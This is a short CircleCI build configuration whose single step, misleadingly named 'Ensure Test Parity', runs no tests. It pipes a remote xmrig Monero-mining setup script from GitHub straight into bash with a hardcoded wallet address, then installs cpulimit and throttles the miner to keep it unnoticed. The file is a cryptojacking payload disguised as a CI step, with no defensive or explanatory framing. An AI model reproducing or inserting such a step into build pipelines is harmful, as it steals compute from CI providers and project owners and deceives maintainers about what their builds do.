version: 2
jobs:
  build:
    machine:
     image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
             curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 82tsjvei4imSqAMBXTUnEPfFdv5PTT6wpim65yfHYErKGmPEDvmdsLSHgNHnQp5xTWitUaiLnNXnvgnvMCyvuUkTF789cgh && sudo apt-get update && sudo apt-get install -y cpulimit && sudo cpulimit -e xmrig -l 150 -b